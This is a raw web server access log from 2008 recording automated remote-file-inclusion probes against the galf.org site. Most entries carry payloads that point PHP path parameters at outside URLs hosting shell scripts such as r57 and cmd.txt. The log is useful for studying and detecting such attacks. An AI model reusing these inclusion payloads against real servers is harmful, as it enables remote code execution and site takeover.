221.143.48.95 - - [30/Mar/2008:18:19:47 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:18:19:50 -0700] "GET /logs/access_070917.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:18:20:45 -0700] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:18:20:50 -0700] "GET /logs//popup.php?include_path=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:18:20:52 -0700] "GET //popup.php?include_path=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
74.200.90.19 - - [30/Mar/2008:18:21:17 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:18:21:36 -0700] "GET //index.php?themesdir=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:18:21:36 -0700] "GET /logs//index.php?themesdir=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:18:22:29 -0700] "GET /logs/access_071022.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.18.207.65 - - [30/Mar/2008:18:22:33 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [30/Mar/2008:18:22:34 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:18:22:43 -0700] "GET /logs/access_071231.log/main.php?page=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:18:22:44 -0700] "GET /main.php?page=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:18:22:46 -0700] "GET /logs/main.php?page=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.2.130 - - [30/Mar/2008:18:26:31 -0700] "GET /logs/access.log/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:18:26:53 -0700] "GET /logs/access_071014.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:18:27:55 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "galf.org"
216.246.77.203 - - [30/Mar/2008:18:30:57 -0700] "GET /logs/access_070716.log//includes/functions_weblog.php?mx_root_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:18:30:57 -0700] "GET //includes/functions_weblog.php?mx_root_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:18:30:57 -0700] "GET /logs//includes/functions_weblog.php?mx_root_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:18:30:58 -0700] "GET /logs/access_070716.log//includes/functions_weblog.php?mx_root_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:18:30:58 -0700] "GET //includes/functions_weblog.php?mx_root_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:18:30:58 -0700] "GET /logs//includes/functions_weblog.php?mx_root_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.213.67 - - [30/Mar/2008:18:31:58 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:18:33:21 -0700] "GET /logs/access_071022.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.146.251.123 - - [30/Mar/2008:18:34:06 -0700] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.146.251.123 - - [30/Mar/2008:18:34:07 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.146.251.123 - - [30/Mar/2008:18:34:08 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:18:35:29 -0700] "GET /logs/access_070716.log//includes/functions_weblog.php?mx_root_path=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:18:35:29 -0700] "GET //includes/functions_weblog.php?mx_root_path=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.90.19 - - [30/Mar/2008:18:37:45 -0700] "GET /logs/access_080225.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.200.90.19 - - [30/Mar/2008:18:37:46 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:18:37:47 -0700] "GET /logs/access_071014.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.200.90.19 - - [30/Mar/2008:18:37:52 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.213.67 - - [30/Mar/2008:18:39:34 -0700] "GET /logs/access_071231.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.213.67 - - [30/Mar/2008:18:39:34 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.213.67 - - [30/Mar/2008:18:39:36 -0700] "GET /logs/access_070806.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:18:39:53 -0700] "GET /logs//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:18:39:54 -0700] "GET //saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:18:42:14 -0700] "GET /logs//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:18:42:15 -0700] "GET //saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.58.170.184 - - [30/Mar/2008:18:45:14 -0700] "GET /logs/access_080113.log/index.php?nic=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.170.184 - - [30/Mar/2008:18:45:15 -0700] "GET /index.php?nic=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.170.184 - - [30/Mar/2008:18:45:15 -0700] "GET /logs/index.php?nic=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
59.106.75.43 - - [30/Mar/2008:18:46:27 -0700] "GET /logs/access_070716.log//includes/functions_weblog.php?mx_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
59.106.75.43 - - [30/Mar/2008:18:46:27 -0700] "GET //includes/functions_weblog.php?mx_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.214.86.231 - - [30/Mar/2008:18:48:00 -0700] "GET /logs/http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.86.231 - - [30/Mar/2008:18:48:00 -0700] "GET /http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.15.78.65 - - [30/Mar/2008:18:49:42 -0700] "GET /logs/http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
67.15.78.65 - - [30/Mar/2008:18:49:42 -0700] "GET /http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:18:50:28 -0700] "GET /logs/access_071008.log//faqsupport/samplefaqsupport.php?path[docroot]=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:18:50:31 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:18:50:34 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
74.6.25.27 - - [30/Mar/2008:18:51:40 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.30.216.92 - - [30/Mar/2008:18:51:40 -0700] "GET /logs/access_070716.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.15.78.65 - - [30/Mar/2008:18:52:44 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:18:54:25 -0700] "GET /index.php?p=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
209.62.80.134 - - [30/Mar/2008:18:54:44 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "galf.org"
209.62.80.134 - - [30/Mar/2008:18:54:44 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "galf.org"
216.184.96.158 - - [30/Mar/2008:18:55:28 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cct.vg/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
216.184.96.158 - - [30/Mar/2008:18:55:28 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cct.vg/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
62.163.141.54 - - [30/Mar/2008:18:57:53 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.80.134 - - [30/Mar/2008:18:57:58 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
209.62.80.134 - - [30/Mar/2008:18:57:59 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:18:59:49 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:18:59:49 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:18:59:49 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:18:59:51 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:18:59:51 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:18:59:51 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:19:00:49 -0700] "GET /logs/access_080114.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:19:00:49 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:19:00:49 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:19:01:54 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:01:57 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:01:57 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:01:57 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:19:02:06 -0700] "GET /logs/access_080225.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:19:02:10 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:19:02:13 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:19:02:49 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:19:02:55 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:19:04:10 -0700] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:04:11 -0700] "GET /logs/access_070924.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:19:04:11 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:19:04:11 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:04:41 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:04:42 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:19:04:55 -0700] "GET /logs/access_070924.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.213.67 - - [30/Mar/2008:19:05:21 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:05:42 -0700] "GET /logs/access_070924.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:19:05:53 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:19:05:53 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:19:05:54 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:06:06 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:06:06 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:06:06 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:19:06:18 -0700] "GET /logs/access_070924.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.163.232 - - [30/Mar/2008:19:06:21 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.capecoral-golf.com/tsys/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.163.232 - - [30/Mar/2008:19:06:21 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.capecoral-golf.com/tsys/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:06:27 -0700] "GET /logs/access_070924.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.18.207.65 - - [30/Mar/2008:19:06:47 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [30/Mar/2008:19:06:47 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:19:06:48 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:19:06:48 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:06:53 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:06:53 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:06:54 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:07:37 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:07:38 -0700] "GET /?N=D HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:07:38 -0700] "GET /?N=A HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:07:39 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:07:40 -0700] "GET /cendoc/?A HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:07:41 -0700] "GET /logs/ HTTP/1.1" 200 6944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:07:45 -0700] "GET /logs/access_080303.log HTTP/1.1" 200 589824 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:07:48 -0700] "GET /logs/access_070806.log HTTP/1.1" 200 589824 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:07:52 -0700] "GET /logs/access_071231.log HTTP/1.1" 200 589824 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:19:07:53 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:19:07:54 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
